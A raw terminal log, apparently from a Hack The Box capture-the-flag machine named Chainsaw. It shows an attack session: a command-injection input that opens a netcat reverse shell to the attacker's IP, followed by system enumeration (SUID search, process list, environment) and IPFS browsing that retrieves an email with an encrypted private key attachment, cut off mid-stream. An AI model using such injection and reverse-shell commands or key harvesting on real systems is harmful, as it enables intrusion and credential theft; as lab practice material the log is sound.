root@kali:~/HTB/Chainsaw# python3 exploit.py
localhost; nc 10.10.16.57 1337 -e /bin/sh

root@kali:~# nc -lvp 1337
listening on [any] 1337 ...
10.10.10.142: inverse host lookup failed: Unknown host
connect to [10.10.16.57] from (UNKNOWN) [10.10.10.142] 41706
whoami
administrator

administrator@chainsaw:/home/administrator$ ls -a
ls -a
.              .bash_logout      .ipfs     .ngrok2   .swt        .zsh_history
..             .bashrc           .local    .profile  .tmux.conf  .zshrc
.bash_history  chainsaw-emp.csv  maintain  .ssh      .zcompdump


administrator@chainsaw:/home/administrator$ uname -a
uname -a
Linux chainsaw 4.18.0-13-generic #14-Ubuntu SMP Wed Dec 5 09:04:24 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
administrator@chainsaw:/home/administrator$ env
env
LS_COLORS=
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home/administrator/.ssh
INVOCATION_ID=7de1334610964c808a03295e68db6554
PWD=/home/administrator
JOURNAL_STREAM=9:21582
SUPERVISOR_PROCESS_NAME=WeaponizedPing
SUPERVISOR_ENABLED=1
SHLVL=1
SUPERVISOR_GROUP_NAME=WeaponizedPing
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
SUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sock
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env
administrator@chainsaw:/home/administrator$ 

administrator@chainsaw:/home/administrator$ grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
<E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
root
administrator@chainsaw:/home/administrator$ find / -perm -u=s -type f 2>/dev/null
<dministrator$ find / -perm -u=s -type f 2>/dev/null
/snap/core/6964/bin/mount
/snap/core/6964/bin/ping
/snap/core/6964/bin/ping6
/snap/core/6964/bin/su
/snap/core/6964/bin/umount
/snap/core/6964/usr/bin/chfn
/snap/core/6964/usr/bin/chsh
/snap/core/6964/usr/bin/gpasswd
/snap/core/6964/usr/bin/newgrp
/snap/core/6964/usr/bin/passwd
/snap/core/6964/usr/bin/sudo
/snap/core/6964/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6964/usr/lib/openssh/ssh-keysign
/snap/core/6964/usr/lib/snapd/snap-confine
/snap/core/6964/usr/sbin/pppd
/snap/core/6130/bin/mount
/snap/core/6130/bin/ping
/snap/core/6130/bin/ping6
/snap/core/6130/bin/su
/snap/core/6130/bin/umount
/snap/core/6130/usr/bin/chfn
/snap/core/6130/usr/bin/chsh
/snap/core/6130/usr/bin/gpasswd
/snap/core/6130/usr/bin/newgrp
/snap/core/6130/usr/bin/passwd
/snap/core/6130/usr/bin/sudo
/snap/core/6130/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6130/usr/lib/openssh/ssh-keysign
/snap/core/6130/usr/lib/snapd/snap-confine
/snap/core/6130/usr/sbin/pppd
/snap/core/6034/bin/mount
/snap/core/6034/bin/ping
/snap/core/6034/bin/ping6
/snap/core/6034/bin/su
/snap/core/6034/bin/umount
/snap/core/6034/usr/bin/chfn
/snap/core/6034/usr/bin/chsh
/snap/core/6034/usr/bin/gpasswd
/snap/core/6034/usr/bin/newgrp
/snap/core/6034/usr/bin/passwd
/snap/core/6034/usr/bin/sudo
/snap/core/6034/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6034/usr/lib/openssh/ssh-keysign
/snap/core/6034/usr/lib/snapd/snap-confine
/snap/core/6034/usr/sbin/pppd
/bin/ping
/bin/fusermount
/bin/su
/bin/ntfs-3g
/bin/umount
/bin/mount
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/passwd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
administrator@chainsaw:/home/administrator$ 
administrator@chainsaw:/home/administrator$ ps aux | grep root
ps aux | grep root
root         1  0.1  0.4 129280  9068 ?        Ss   16:29   0:06 /sbin/init
root         2  0.0  0.0      0     0 ?        S    16:29   0:00 [kthreadd]
root       497  0.0  0.5 131524 10848 ?        Ssl  16:30   0:04 /usr/bin/vmtoolsd
root       502  0.0  0.8 103648 16860 ?        S<s  16:30   0:01 /lib/systemd/systemd-journald
root       503  0.0  0.0      0     0 ?        I<   16:30   0:00 [iscsi_eh]
root       509  0.0  0.0  83356  1632 ?        Ss   16:30   0:00 /sbin/lvmetad -f
root       510  0.0  0.0      0     0 ?        I<   16:30   0:00 [ib-comp-wq]
root       511  0.0  0.0      0     0 ?        I<   16:30   0:00 [ib_mcast]
root       512  0.0  0.0      0     0 ?        I<   16:30   0:00 [ib_nl_sa_wq]
root       515  0.0  0.0      0     0 ?        I<   16:30   0:00 [rdma_cm]
root       522  0.0  0.2  26792  5992 ?        Ss   16:30   0:01 /lib/systemd/systemd-udevd
root       526  0.0  0.0      0     0 ?        S<   16:30   0:00 [loop0]
root      1012  0.0  0.2  38284  5976 ?        Ss   16:30   0:00 /lib/systemd/systemd-logind
root      1026  0.0  0.1  94308  3460 ?        Ssl  16:30   0:00 /usr/sbin/irqbalance --foreground
root      1034  0.0  0.8  45688 17360 ?        Ss   16:30   0:01 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root      1035  0.0  0.3 248788  6820 ?        Ssl  16:30   0:00 /usr/lib/accountsservice/accounts-daemon
root      1036  0.0  1.0  29856 21380 ?        Ss   16:30   0:02 /usr/bin/python /usr/bin/supervisord -n -c /etc/supervisor/supervisord.conf
root      1044  0.0  0.1  14804  2816 ?        Ss   16:30   0:00 /usr/sbin/cron -f
root      1048  0.0  0.4  57228  9632 ?        Ss   16:30   0:00 /usr/bin/VGAuthService
root      1058  0.0  1.0 841852 21976 ?        Ssl  16:30   0:04 /usr/lib/snapd/snapd
root      1061  0.0  0.1  16892  3164 ?        Ss   16:30   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root      1072  0.0  0.3  31548  6312 ?        Ss   16:30   0:00 /usr/sbin/sshd -D
root      1073  0.0  0.3 246088  6476 ?        Ssl  16:30   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1084  0.0  0.0   5832  1776 tty1     Ss+  16:30   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      2119  0.0  0.0      0     0 ?        I    16:44   0:00 [kworker/1:0-events]
root      2140  0.0  0.3  63260  7440 ?        Ss   16:44   0:00 sshd: bobby [priv]
root      2217  0.0  0.0   2372   720 pts/0    S    16:44   0:00 ./ChainsawClub
root      2218  0.0  0.0   2616   852 pts/0    S    16:44   0:00 sh -c sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/ChainsawClub
root      2219  0.0  0.2  33136  4316 pts/0    S    16:44   0:00 sudo -i -u root /root/ChainsawClub/dist/ChainsawClub/ChainsawClub
root      2223  0.0  0.0   4744   872 pts/0    S    16:44   0:00 /root/ChainsawClub/dist/ChainsawClub/ChainsawClub
root      2229  0.0  2.0  97952 42216 pts/0    S    16:44   0:01 /root/ChainsawClub/dist/ChainsawClub/ChainsawClub
root      2255  0.0  0.0   2616   852 pts/0    S    16:44   0:00 sh -c cd /home/bobby/projects/ChainsawClub && /bin/bash
root      2256  0.0  0.1   9044  3748 pts/0    S+   16:44   0:00 /bin/bash
root      2575  0.0  0.0      0     0 ?        I    17:16   0:00 [kworker/1:2]
root      2588  0.0  0.0      0     0 ?        I    17:16   0:00 [kworker/u4:1-events_unbound]
root      2610  0.0  0.0      0     0 ?        I    17:18   0:01 [kworker/0:2-events]
root      2679  0.0  0.0      0     0 ?        I    17:25   0:00 [kworker/0:0-cgroup_destroy]
root      2755  0.0  0.0      0     0 ?        I    17:41   0:00 [kworker/u4:0-events_power_efficient]
root      2818  0.0  0.0      0     0 ?        I    17:49   0:00 [kworker/u4:2-events_unbound]
adminis+  2831  0.0  0.0   6276   904 pts/1    S+   17:53   0:00 grep --color=auto root
administrator@chainsaw:/home/administrator$ 

administrator@chainsaw:/opt/WeaponizedPing$ ipfs id
ipfs id
{
	"ID": "QmPfaAfb157bVHC1Y3waMEkX5QHjrF5UrvHqcNdp4R1BGy",
	"PublicKey": "CAASpgIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeME8+9MUmzPvifqnqC7dM4rtPfqOn4STLZxC5OgizeavrygOubfKosRdRkKNkm9DdNTsR5gB9QANiHkRnQ57bLwheH4o895Ib/lW/WOhwmOtks1iV9VIUj7DTnuQDNcN2IuVcnpC8x5HFQoNIgsj2HgqxLnlPCJboaTYo3oGwflqE2o2+/pwZjM2My3ux9FYCg7GhEpXO6WGpH6Jxq2Z3wOA1z1qVSOmAPSPgSOvvFGvKyfU6ntta8qd3EC15x4002CB9OSA/pTbchSTr3gS9QOMq5Wn55vEwNaOFNf/qOImaRWYER8epyHB/E4kKJ9XAeL7U7xfKpQDhrqvEdq2/AgMBAAE=",
	"Addresses": null,
	"AgentVersion": "go-ipfs/0.4.18/",
	"ProtocolVersion": "ipfs/0.1.0"
}

administrator@chainsaw:/opt/WeaponizedPing$ ipfs ls /ipfs/QmPfaAfb157bVHC1Y3waMEkX5QHjrF5UrvHqcNdp4R1BGy
<ipfs/QmPfaAfb157bVHC1Y3waMEkX5QHjrF5UrvHqcNdp4R1BGy
Error: merkledag: not found
administrator@chainsaw:/opt/WeaponizedPing$ ipfs refs local
ipfs refs local
QmYCvbfNbCwFR45HiNP45rwJgvatpiW38D961L5qAhUM5Y
QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx
QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
QmdL9t1YP99v4a2wyXFYAQJtbD9zKnPrugFLQWXBXb82sn
QmSKboVigcD3AY4kLsob117KJcMHvMUu6vNFqk1PQzYUpp
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn
QmegE6RZe59xf1TyDdhhcNnMrsevsfuJHUynLuRc4yf6V1
QmWSLAHhiNVRMFMv4bnE7fqq9E74RtXTRm9E1QVo37GV9t
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq
QmZrd1ik8Z2F5iSZPDA2cZSmaZkHFEE4jZ3MiQTDKHAiri
QmdfTbBqBPQ7VNxZEYEj14VmRuZBkqFbiwReogJgS1zR1n
QmfRZWFfaugHeY5gcgNDrnRkxhPT3epmHodryPYK3it6kk
QmZTR5bcpQD7cFgTorqxZDYaew1Wqgfbd2ud9QqGPAkK2V
QmejvEPop4D7YUadeGqYWmZxHhLc4JBUCzJJHWMzdcMe2y
QmbkQxbErC7KSWzSQw2FC13LUm9Rbo2XjeFQZbcmdarpuz
QmPpsT37SpTbZkAeMz7LXiJ8nQseBNziGBzpW1YtM67qx6
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC
QmViFN1CKxrg3ef1S8AJBZzQ2QS8xrcq3wHmyEfyXYjCMF
QmZxzK6gXioAUH9a68ojwkos8EaeANnicBJNA3TND4Sizp
Qmb7oGTxge7amSArtJsGUAqswY8y1G7m5QNjV57Nj5sEHU
QmS4ustL54uo8FzR9455qaxZwuMiUhyvMcX9Ba8nUH4uVv
QmXymZCHdTHz5BA5ugv9MQTBtQAb6Vit4iFeEnuRj6Udrh
QmUNLLsPACCz1vLxQVkXqqLX5R1X345qqfHbsf67hvA3Nn
Qma6kDKzUzFioo62v4LZaNsrwmCojF9AqwLaQJubRFnsAa
QmXwXzVYKgYZEXU1dgCKeejT87Knw9nydGcuUZrjwNb2Me
QmXgqKTbzdh83pQtKFb19SpMCpDDcKR2ujqk3pKph9aCNF
QmYn3NxLLYA6xU2XL1QJfCZec4B7MpFNxVVtDvqbiZCFG8
QmWMuEvh2tGJ1DiNPPoN6rXme2jMYUixjxsC6QUji8mop8
QmY5heUM5qgRubMDD1og9fhCPA6QdkMp3QCwd4s7gJsyE7
QmQ5vhrL7uv6tuoN9KeVBwd4PwfQkXdVVmDLUZuTNxqgvm
QmZMUdskS6vK8ycBiAffrYAE4wUDuWX9eK7kNgQqPCGbwF
QmPC3ZbrMeZ8BpstpNseNV4fCRL4QDzUKrSv8EHkarbn7r
QmPhk6cJkRcFfZCdYam4c9MKYjFG9V29LswUnbrFNhtk2S
QmSyJKw6U6NaXupYqMLbEbpCdsaYR5qiNGRHjLKcmZV17r
QmZZRTyhDpL5Jgift1cHbAhexeE1m2Hw8x8g7rTcPahDvo
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M
QmPZ9gcCEpqKTo6aq61g2nXGUhM4iCL3ewB6LDXZCtioEB
Qmc7rLAhEh17UpguAsEyS4yfmAbeqSeSEz4mZZRNcW52vV
administrator@chainsaw:/opt/WeaponizedPing$ 

administrator@chainsaw:/home$ ipfs ls QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx
<s ls QmPctBY8tq2TpPufHuQUbe2sCxoy2wD5YRB6kdce35ZwAx
QmXWS8VFBxJPsxhF8KEqN1VpZf52DPhLswcXpxEDzF5DWC 391 arti.key.pub
QmPjsarLFBcY8seiv3rpUZ2aTyauPF3Xu3kQm56iD6mdcq 391 bobby.key.pub
QmUHHbX4N8tUNyXFK9jNfgpFFddGgpn72CF1JyNnZNeVVn 391 bryan.key.pub
QmUH2FceqvTSAvn6oqm8M49TNDqowktkEx4LgpBx746HRS 391 lara.key.pub
QmcMCDdN1qDaa2vaN654nA4Jzr6Zv9yGSBjKPk26iFJJ4M 391 wendy.key.pub
administrator@chainsaw:/home$ ipfs ls QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
<s ls QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
administrator@chainsaw:/home$ ipfs cat QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
< cat QmbwWcNc7TZBUDFzwW7eUTAyLE2hhwhHiTXqempi1CgUwB
X-Pm-Origin: internal
X-Pm-Content-Encryption: end-to-end
Subject: Ubuntu Server Private RSA Key
From: IT Department <chainsaw_admin@protonmail.ch>
Date: Thu, 13 Dec 2018 19:50:58 +0000
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary=---------------------f0b2a3c7251b9a231d99389237f1d80d
To: artichain600@protonmail.ch <artichain600@protonmail.ch>
X-Attached: arti.key.enc
Message-Id: <YDDxZ5fRxcBUJi1FuTRLfhVuvA9jKEGECQvG58UZwVGdwb_QP22lDtvAwDXgQyZL4kwJt1X0bratgEYlzTe2ZCvQ0lxertJN74dDX3p8uck=@protonmail.ch>
Received: from mail.protonmail.ch by mail.protonmail.ch; Thu, 13 Dec 2018 14:51:02 -0500
X-Original-To: artichain600@protonmail.ch
Return-Path: <chainsaw_admin@protonmail.ch>
Delivered-To: artichain600@protonmail.ch

-----------------------f0b2a3c7251b9a231d99389237f1d80d
Content-Type: multipart/related;boundary=---------------------da569112503ba42fda815a207eaafd92

-----------------------da569112503ba42fda815a207eaafd92
Content-Type: text/html;charset=utf-8
Content-Transfer-Encoding: base64

PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAm
cXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNp
emU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9y
bWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXIt
c3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRl
bnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93
czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsg
dGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGlu
aXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPkFydGksPGJyPjwv
ZGl2PjxkaXYgc3R5bGU9ImNvbG9yOiByZ2IoODUsIDg1LCA4NSk7IGZvbnQtZmFtaWx5OiBBcmlh
bCwgJnF1b3Q7SGVsdmV0aWNhIE5ldWUmcXVvdDssIEhlbHZldGljYSwgc2Fucy1zZXJpZjsgZm9u
dC1zaXplOiAxNHB4OyBmb250LXN0eWxlOiBub3JtYWw7IGZvbnQtdmFyaWFudC1saWdhdHVyZXM6
IG5vcm1hbDsgZm9udC12YXJpYW50LWNhcHM6IG5vcm1hbDsgZm9udC13ZWlnaHQ6IDQwMDsgbGV0
dGVyLXNwYWNpbmc6IG5vcm1hbDsgb3JwaGFuczogMjsgdGV4dC1hbGlnbjogc3RhcnQ7IHRleHQt
aW5kZW50OiAwcHg7IHRleHQtdHJhbnNmb3JtOiBub25lOyB3aGl0ZS1zcGFjZTogbm9ybWFsOyB3
aWRvd3M6IDI7IHdvcmQtc3BhY2luZzogMHB4OyAtd2Via2l0LXRleHQtc3Ryb2tlLXdpZHRoOiAw
cHg7IHRleHQtZGVjb3JhdGlvbi1zdHlsZTogaW5pdGlhbDsgdGV4dC1kZWNvcmF0aW9uLWNvbG9y
OiBpbml0aWFsOyBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoMjU1LCAyNTUsIDI1NSk7Ij48YnI+PC9k
aXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFs
LCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250
LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczog
bm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0
ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1p
bmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdp
ZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBw
eDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6
IGluaXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPkkgYW0gd3Jp
dGluZyB0aGlzIGVtYWlsIGluIHJlZmVyZW5jZSB0byB0aGUgbWV0aG9kIG9uIGhvdyB3ZSBhY2Nl
c3Mgb3VyIExpbnV4IHNlcnZlciBmcm9tIG5vdyBvbi4gRHVlIHRvIHNlY3VyaXR5IHJlYXNvbnMs
IHdlIGhhdmUgZGlzYWJsZWQgU1NIIHBhc3N3b3JkIGF1dGhlbnRpY2F0aW9uIGFuZCBpbnN0ZWFk
IHdlIHdpbGwgdXNlIHByaXZhdGUvcHVibGljIGtleSBwYWlycyB0byBzZWN1cmVseSBhbmQgY29u
dmVuaWVudGx5IGFjY2VzcyB0aGUgbWFjaGluZS48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6
IHJnYig4NSwgODUsIDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1
ZSZxdW90OywgSGVsdmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5
bGU6IG5vcm1hbDsgZm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQt
Y2Fwczogbm9ybWFsOyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBv
cnBoYW5zOiAyOyB0ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFu
c2Zvcm06IG5vbmU7IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5n
OiAwcHg7IC13ZWJraXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0
eWxlOiBpbml0aWFsOyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQt
Y29sb3I6IHJnYigyNTUsIDI1NSwgMjU1KTsiPjxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjog
cmdiKDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVl
JnF1b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHls
ZTogbm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1j
YXBzOiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9y
cGhhbnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5z
Zm9ybTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6
IDBweDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyB0ZXh0LWRlY29yYXRpb24tc3R5
bGU6IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsgYmFja2dyb3VuZC1j
b2xvcjogcmdiKDI1NSwgMjU1LCAyNTUpOyI+QXR0YWNoZWQgeW91IHdpbGwgZmluZCB5b3VyIHBl
cnNvbmFsIGVuY3J5cHRlZCBwcml2YXRlIGtleS4gUGxlYXNlIGFzayZuYnNwO3JlY2VwdGlvbiBk
ZXNrIGZvciB5b3VyIHBhc3N3b3JkLCB0aGVyZWZvcmUgYmUgc3VyZSB0byBicmluZyB5b3VyIHZh
bGlkIElEIGFzIGFsd2F5cy48YnI+PC9kaXY+PGRpdiBzdHlsZT0iY29sb3I6IHJnYig4NSwgODUs
IDg1KTsgZm9udC1mYW1pbHk6IEFyaWFsLCAmcXVvdDtIZWx2ZXRpY2EgTmV1ZSZxdW90OywgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmOyBmb250LXNpemU6IDE0cHg7IGZvbnQtc3R5bGU6IG5vcm1hbDsg
Zm9udC12YXJpYW50LWxpZ2F0dXJlczogbm9ybWFsOyBmb250LXZhcmlhbnQtY2Fwczogbm9ybWFs
OyBmb250LXdlaWdodDogNDAwOyBsZXR0ZXItc3BhY2luZzogbm9ybWFsOyBvcnBoYW5zOiAyOyB0
ZXh0LWFsaWduOiBzdGFydDsgdGV4dC1pbmRlbnQ6IDBweDsgdGV4dC10cmFuc2Zvcm06IG5vbmU7
IHdoaXRlLXNwYWNlOiBub3JtYWw7IHdpZG93czogMjsgd29yZC1zcGFjaW5nOiAwcHg7IC13ZWJr
aXQtdGV4dC1zdHJva2Utd2lkdGg6IDBweDsgdGV4dC1kZWNvcmF0aW9uLXN0eWxlOiBpbml0aWFs
OyB0ZXh0LWRlY29yYXRpb24tY29sb3I6IGluaXRpYWw7IGJhY2tncm91bmQtY29sb3I6IHJnYigy
NTUsIDI1NSwgMjU1KTsiPjxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdiKDg1LCA4NSwg
ODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1b3Q7LCBIZWx2
ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTogbm9ybWFsOyBm
b250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBzOiBub3JtYWw7
IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhhbnM6IDI7IHRl
eHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9ybTogbm9uZTsg
d2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBweDsgLXdlYmtp
dC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6IGluaXRpYWw7
IHRleHQtZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsgYmFja2dyb3VuZC1jb2xvcjogcmdiKDI1
NSwgMjU1LCAyNTUpOyI+U2luY2VyZWx5LDxicj48L2Rpdj48ZGl2IHN0eWxlPSJjb2xvcjogcmdi
KDg1LCA4NSwgODUpOyBmb250LWZhbWlseTogQXJpYWwsICZxdW90O0hlbHZldGljYSBOZXVlJnF1
b3Q7LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGZvbnQtc2l6ZTogMTRweDsgZm9udC1zdHlsZTog
bm9ybWFsOyBmb250LXZhcmlhbnQtbGlnYXR1cmVzOiBub3JtYWw7IGZvbnQtdmFyaWFudC1jYXBz
OiBub3JtYWw7IGZvbnQtd2VpZ2h0OiA0MDA7IGxldHRlci1zcGFjaW5nOiBub3JtYWw7IG9ycGhh
bnM6IDI7IHRleHQtYWxpZ246IHN0YXJ0OyB0ZXh0LWluZGVudDogMHB4OyB0ZXh0LXRyYW5zZm9y
bTogbm9uZTsgd2hpdGUtc3BhY2U6IG5vcm1hbDsgd2lkb3dzOiAyOyB3b3JkLXNwYWNpbmc6IDBw
eDsgLXdlYmtpdC10ZXh0LXN0cm9rZS13aWR0aDogMHB4OyB0ZXh0LWRlY29yYXRpb24tc3R5bGU6
IGluaXRpYWw7IHRleHQtZGVjb3JhdGlvbi1jb2xvcjogaW5pdGlhbDsgYmFja2dyb3VuZC1jb2xv
cjogcmdiKDI1NSwgMjU1LCAyNTUpOyI+SVQgQWRtaW5pc3RyYXRpb24gRGVwYXJ0bWVudDxicj48
L2Rpdj4=
-----------------------da569112503ba42fda815a207eaafd92--
-----------------------f0b2a3c7251b9a231d99389237f1d80d
Content-Type: application/octet-stream; filename="arti.key.enc"; name="arti.key.enc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="arti.key.enc"; name="arti.key.enc"

LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
Sy1JbmZvOiBERVMtRURFMy1DQkMsNTExMTc0NEIyOTg1RDZEMwoKTElPWGhMeEVpZDNCVEo1eWxS
QkVzQjMySGhDQXBIcEUzWnE1dStuTlpwbk8yWFBiTyszUXRWVGVPeWxHUmw4TwpCQ0dNeEdyNEc2
cXg1TkJzZ1JoOFNnTFk5SGxvM255cVhzemlTTGdjNUFvKzMwSVBFUG52eHJnSmFjWURQaUM3Ck9s
VXBKVTdEcnZocFdOTE5mb1pCZHFoU2xaVGVIZXkxRlpIMnFqdGRNZENzK2kwZEtGRWFGRm9Qb3pB
WGNpWk0KTCtwQ05sVXgxRkgzYjNIdU9oTU4veXBZbEE5Y1BCdUsyUkk0ODA5VSt1STdZU1oxNU1x
NHlVT2NuRVhycVpTOQpkNFJpdGlrdU9tcHYwZ282aEFKS0p6L1BDNkZ2L2xtclRoekxsc29iWlZj
SUhjV0labnkvSng2cy9tcnhwaGt2CmN1emEyd1lnRmhra3duRm5qVlpleTJkYU9LSnBoYkFxenlx
R2tIaU52S3A1dkkyQWx4QW50Y0gySnhKUE56cFkKMFBhSlVoZStNREpxUVBLOWlzeTlpT25qbkxF
eVVXcCtkc3d1Tk1PU0tQT3FsL2hvNlIzVmxrZ1ZRVjZPS0g1cgp3by9tb2FGWmt0UXB4aTIvVytp
dHdTdXlDSkQ4RlhWdHZyZzRxVDhlaVRXRFNkYlNkM3VwT29wQSs4OGdZTUU5CnNqbVJGWDZCcGNZ
VDI3djV3aElySlYwYjJPTFZ1b0Z2dDB6MVpMRHdTaUQvZC9Xa3hZVE9WL3dNazlBKzM0KzYKamVw
aDlMMjFnZVdERXZ2czNxd2JXOFM2MU5mSW44NEFwYmxjVEduMkFnOEZsY3R2K2pwN09aeHMvRkRa
NU1TTgowaUJrTTdHZHBXamNrcEtXUm83RjdFQjVUV25kbWc1RklPYVQzMENMQUtkdWtlQ3FuNDQ4
ZlZ1c3hZSVlteEthCk0ydWFUL0tXUjdLOEF5a0w3dlo0MDdPTmZrTStvci9Ubi9udVgwL2ZSekpP
